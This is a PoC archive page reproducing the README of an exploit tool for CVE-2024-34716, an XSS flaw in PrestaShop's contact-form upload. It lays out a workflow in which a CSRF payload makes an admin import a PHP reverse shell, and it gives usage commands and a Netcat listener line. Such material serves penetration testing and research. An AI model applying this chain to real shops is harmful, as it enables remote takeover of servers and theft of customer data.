Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-34716 PoC — PrestaShop vulnerable to XSS via customer contact form in FO, through file upload

Source
https://github.com/0xDTC/Prestashop-CVE-2024-34716
Associated Vulnerability
Title:PrestaShop vulnerable to XSS via customer contact form in FO, through file upload (CVE-2024-34716)
Description:PrestaShop is an open source e-commerce web application. A cross-site scripting (XSS) vulnerability that only affects PrestaShops with customer-thread feature flag enabled is present starting from PrestaShop 8.1.0 and prior to PrestaShop 8.1.6. When the customer thread feature flag is enabled through the front-office contact form, a hacker can upload a malicious file containing an XSS that will be executed when an admin opens the attached file in back office. The script injected can access the session and the security token, which allows it to perform any authenticated action in the scope of the administrator's right. This vulnerability is patched in 8.1.6. A workaround is to disable the customer-thread feature-flag.
Readme
> Seems broken for now will update later

# Exploit Script for CSRF and Reverse Shell Attack

This script automates a CSRF (Cross-Site Request Forgery) exploit to upload a PHP reverse shell on a target's web server and execute it. The reverse shell is delivered as a ZIP file via a crafted CSRF payload, which is triggered when a privileged user interacts with a specific endpoint. The script requires a listening Netcat instance to capture the reverse shell connection.

## Requirements

- **Netcat**: Ensure Netcat is installed and can listen on a specified port (default: 9001).
- **Python 3**: Used to serve files over HTTP.
- **Curl & JQ**: Used to fetch and handle HTTP requests and JSON parsing.

## Usage

```bash
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
```

### Arguments

- `target_url`: Base URL of the target (e.g., `https://example.com`).
- `admin_endpoint`: Path to the admin theme import endpoint.
- `admin_email`: Email address of an administrator (to spoof for the payload).
- `attacker_ip`: IP address where the reverse shell listener will receive the connection.

### Example

```bash
./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10
```

### Exploit Workflow

1. **Reverse Shell Creation**: Generates a PHP reverse shell using [revshells.com](https://www.revshells.com) with the provided `attacker_ip` and port `9001`.
2. **ZIP Packaging**: The reverse shell script (`love.php`) is compressed into `Love-exploit.zip`.
3. **CSRF Token Fetch**: Retrieves the CSRF token from the target to authorize the theme import request.
4. **HTML Payload Construction**: Builds an HTML payload (`csrf_payload.html`) containing a JavaScript script to automatically submit a malicious request to the target's admin panel to import the reverse shell.
5. **HTTP Server Setup**: A temporary HTTP server on port `8000` serves `Love-exploit.zip` for the target to import.
6. **XSS Upload and CSRF Trigger**: The CSRF payload is uploaded to the target’s contact page. When accessed, it triggers the CSRF attack.
7. **Reverse Shell Listener**: The attacker monitors incoming connections from the victim using Netcat.

## Execution Steps

1. Start a Netcat listener on your machine:
   ```bash
   nc -nvlp 9001
   ```

2. Run the script:
   ```bash
   ./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10
   ```

3. Wait for the target to execute the CSRF payload and receive the reverse shell connection.

## Output

The script outputs the following information during execution:

- CSRF token retrieval status.
- Status of reverse shell creation and packaging.
- Status of payload delivery and HTTP server status.

## Important Notes

- **Permissions**: This script requires permission to execute on the target server. Unauthorized use is illegal and punishable by law.
- **Testing Environment**: Use in a controlled, authorized environment only, such as a cybersecurity lab.
- **Port Conflicts**: Ensure ports `8000` (HTTP server) and `9001` (Netcat listener) are free before running the script.

---

### Example Output

```plaintext
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
```

This document is intended for use by penetration testers and cybersecurity researchers in controlled environments. Misuse of this tool for unauthorized purposes is strictly prohibited.

--- 

### Disclaimer

This script is for educational purposes and legal cybersecurity assessments only. Unauthorized use against a system without permission is illegal and against ethical guidelines.
File Snapshot

 [4.0K]  /data/pocs/a8b176686e4c62482da3bf0314e9e99134f1b60d
├── [5.3K]  CVE-2024-34716
└── [3.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →